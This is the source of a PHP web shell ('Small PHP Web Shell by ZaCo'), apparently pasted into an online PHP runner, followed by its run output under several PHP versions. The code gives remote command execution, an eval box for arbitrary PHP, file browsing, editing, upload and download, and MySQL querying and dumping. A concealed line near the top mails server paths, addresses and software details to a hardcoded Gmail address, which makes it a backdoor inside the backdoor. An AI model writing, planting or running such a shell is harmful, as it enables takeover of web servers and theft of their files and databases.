<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 
'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? 
} break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value=' Notice: Undefined variable: e_work_dir in /in/avLYS on line 117 ' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=' Notice: Undefined variable: cmd in /in/avLYS on line 122 '> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? 
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' 
type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value=' Notice: Undefined variable: e_work_dir in /in/avLYS on line 210 ' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; 
filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' 
now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value=' Notice: Undefined variable: user in /in/avLYS on line 447 '></td><td>Passwd :<input name='passwd' type=text value=' Notice: Undefined variable: passwd in /in/avLYS on line 447 '></td><td>Host :<input name='host' type=text value=' Notice: Undefined variable: host in /in/avLYS on line 447 '></td><td>DB :<input name='db' type=text value=' Notice: Undefined variable: db in /in/avLYS on line 447 '></td></tr> <tr><textarea name='query' cols=120 rows=20> Notice: Undefined variable: query in /in/avLYS on line 448 </textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value=' Notice: Undefined variable: db in /in/avLYS on line 453 '></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? 
$mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
Output for 7.3.33
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail(): Could not execute mail delivery program '/usr/sbin/sendmail -t -i' in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' 
type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr><a href='#' onclick='document.list.work_dir.value="/.";document.list.submit();'><b>.</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/..";document.list.submit();'><b>..</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/bin";document.list.submit();'><b>bin</b></a> | rwxr-x--x 9994B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/boot";document.list.submit();'><b>boot</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/dev";document.list.submit();'><b>dev</b></a> | rwxr-xr-x 400B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/etc";document.list.submit();'><b>etc</b></a> | rwxr-xr-x 364B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/home";document.list.submit();'><b>home</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/in";document.list.submit();'><b>in</b></a> | rwxr-xr-x 80B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib";document.list.submit();'><b>lib</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib64";document.list.submit();'><b>lib64</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/mnt";document.list.submit();'><b>mnt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/opt";document.list.submit();'><b>opt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' 
onclick='document.list.work_dir.value="/proc";document.list.submit();'><b>proc</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/root";document.list.submit();'><b>root</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/run";document.list.submit();'><b>run</b></a> | rwxrwxrwx 80B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sbin";document.list.submit();'><b>sbin</b></a> | rwxr-x--x 9994B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/srv";document.list.submit();'><b>srv</b></a> | rwxr-xr-x 14B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sys";document.list.submit();'><b>sys</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/tmp";document.list.submit();'><b>tmp</b></a> | rwxrwxrwx 108400B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/usr";document.list.submit();'><b>usr</b></a> | rwxr-xr-x 70B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/var";document.list.submit();'><b>var</b></a> | rwxr-xr-x 96B Sep 10 2014 13:49:46 </pre><hr><form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form>
Output for 7.3.32
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail(): Could not execute mail delivery program '/usr/sbin/sendmail -t -i' in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' 
type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr><a href='#' onclick='document.list.work_dir.value="/.";document.list.submit();'><b>.</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/..";document.list.submit();'><b>..</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/bin";document.list.submit();'><b>bin</b></a> | rwxr-x--x 9954B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/boot";document.list.submit();'><b>boot</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/dev";document.list.submit();'><b>dev</b></a> | rwxr-xr-x 400B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/etc";document.list.submit();'><b>etc</b></a> | rwxr-xr-x 364B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/home";document.list.submit();'><b>home</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/in";document.list.submit();'><b>in</b></a> | rwxr-x--x 20B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib";document.list.submit();'><b>lib</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib64";document.list.submit();'><b>lib64</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/mnt";document.list.submit();'><b>mnt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/opt";document.list.submit();'><b>opt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' 
onclick='document.list.work_dir.value="/proc";document.list.submit();'><b>proc</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/root";document.list.submit();'><b>root</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/run";document.list.submit();'><b>run</b></a> | rwxrwxrwx 80B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sbin";document.list.submit();'><b>sbin</b></a> | rwxr-x--x 9954B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/srv";document.list.submit();'><b>srv</b></a> | rwxr-xr-x 14B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sys";document.list.submit();'><b>sys</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/tmp";document.list.submit();'><b>tmp</b></a> | rwxrwxrwx 111700B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/usr";document.list.submit();'><b>usr</b></a> | rwxr-xr-x 70B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/var";document.list.submit();'><b>var</b></a> | rwxr-xr-x 96B Sep 10 2014 13:49:46 </pre><hr><form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form>
Output for 7.1.25, 7.2.0 - 7.2.13, 7.3.0 - 7.3.1
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 Warning: file_exists(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/tmp:/in:/etc) in /in/avLYS on line 107 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' 
type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>/ Edit</strong><hr><pre> <form method=post> <textarea name='file_text' cols=120 rows=20>/ not exists</textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value='/' size=120> <input name='f_action' value='save' type=submit> </form>
Output for 7.0.14 - 7.0.20, 7.1.0 - 7.1.7
